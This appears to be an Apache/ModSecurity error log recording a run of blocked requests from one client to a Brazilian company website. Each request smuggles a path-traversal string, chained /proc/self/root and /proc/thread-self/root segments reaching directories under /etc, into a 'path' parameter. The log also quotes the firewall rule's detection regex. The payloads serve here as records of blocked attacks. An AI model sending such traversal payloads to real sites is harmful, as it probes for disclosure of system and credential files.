[Wed Mar 18 10:22:37.676816 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:53854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnHeyqAr6etmhZHNq7ZQAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:39.041827 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:53870] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnH9a6ubjKNq_cu4aVPAAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:40.795494 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.243.128:57252] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnICmAPhZkrhU8w4loggAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:42.159070 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.243.128:57262] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnIimAPhZkrhU8w4lohQAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:43.560645 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:57264] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnI-yqAr6etmhZHNq7cAAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:44.843379 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:57272] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnJOyqAr6etmhZHNq7dAAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:46.203172 2026] [:error] [pid 15051:tid 140411691570944] [client 74.7.243.128:57274] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnJimAPhZkrhU8w4lohwAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:47.542996 2026] [:error] [pid 15051:tid 140411674785536] [client 74.7.243.128:57288] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnJymAPhZkrhU8w4lojAAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:48.855288 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:57302] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnKNa6ubjKNq_cu4aVQwAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:50.179025 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:35958] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnKta6ubjKNq_cu4aVRwAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:51.506434 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:35974] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnK9a6ubjKNq_cu4aVTgAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:52.794525 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:35978] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnLNa6ubjKNq_cu4aVUQAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:54.128898 2026] [:error] [pid 11816:tid 140411708356352] [client 74.7.243.128:35990] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnLuw_le52K8_3pV3bkwAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:55.456058 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.243.128:36004] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnL-w_le52K8_3pV3blQAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:56.779161 2026] [:error] [pid 11816:tid 140411649607424] [client 74.7.243.128:36012] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnMOw_le52K8_3pV3blwAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:58.086097 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.243.128:36028] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnMtY0UrI5A3LftIyidQAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:22:59.440931 2026] [:error] [pid 29882:tid 140411574073088] [client 74.7.243.128:46214] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnM0zinOy1jxa1j4cRMQAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:23:00.805096 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.243.128:46216] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnNMdf6f5d65gmYZTRkAAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:23:02.220585 2026] [:error] [pid 15051:tid 140411624429312] [client 74.7.243.128:46230] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnNimAPhZkrhU8w4lolQAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:23:03.479466 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.243.128:46244] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnN_u8EFLIOrSqIpsAdAAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:23:04.859260 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:46254] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnONY0UrI5A3LftIyidwAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
